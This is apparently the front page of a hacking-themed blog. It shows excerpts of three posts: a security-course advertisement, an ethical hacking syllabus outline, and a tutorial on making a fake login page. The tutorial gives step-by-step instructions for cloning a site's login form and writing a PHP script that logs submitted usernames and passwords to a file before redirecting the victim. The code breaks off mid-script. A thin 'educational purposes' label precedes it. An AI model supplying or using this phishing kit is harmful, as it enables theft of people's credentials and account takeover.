Skip to main content

Posts

Showing posts from November, 2019

7 course that will help you start a lucrative career in information security

7 Courses That Will Help You Start a Lucrative Career in Information Security  November 17, 2019 As the world becomes more interconnected by the day, more and more companies of all sizes and industries are finding themselves under attack by fearless cybercriminals who can access their entire server farms from across the globe with only a few lines of code. And it's not just private corporations that are suffering. A wide range of government agencies are also constantly under attack, and national security is relying more and more on counter-cyberattack measures to safeguard everything from classified data to entire power grids. So it should come as no surprise that the overarching field of information security is booming, and those with the skills to thwart and retaliate against a growing number of sophisticated cyber threats are in high-demand across countless industries. The  Complete Information Security Certification Bundle  will help you join this lucr

Ethicalbot

  Ethical h acking  Types of Attacks o Types of Attacks on a System o Operating System Attacks  o Misconfiguration Attacks  o Application-Level Attacks o Examples of Application-Level Attacks o Shrink Wrap Code Attacks  Information Security Controls o Why Ethical Hacking is Necessary o Scope and Limitations of Ethical Hacking o Skills of an Ethical Hacker o Defense in Depth o Incident Management Process o Information Security Policies o Classification of Security Policies o Structure and Contents of Security Policies o Types of Security Policies o Steps to Create and Implement Security Policies o Examples of Security Policies o Vulnerability Research o Vulnerability Research Websites o What Is Penetration Testing? o Why Penetration Testing o Penetration Testing Methodology. Guys i believe if you build on these basics you will not be a victim of any hack,get acquainted with types of attack so you will know an attack when you see one
        How  To Make A Fake Login Page EthicabotNovember 16, 2019 This post is For Educational purposes. Hello this is a tutorial on how to make a fake login page. Before we start I want to say that I did not make this guide and am simply sharing it here. 1- open up the site that you want to make the fake page from it, after the load right click and save the page as “web page complete” 2- now open that page with notepad, and press control+F to access search bar, and then search “login” 3- behind the word “login” it’s written .action, we don’t need those so delete everything behind the login (this tutorial is for PHP, may you see login.aspx) 4- if you saw method=”post” change it to method=”GET”  5- ok now save it as .html 6- open a new notepad, and write this commands on it:<?php header (‘Location:target.com’); $handle = fopen(“log.txt”, “a”); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, “=”); fwrite($handle,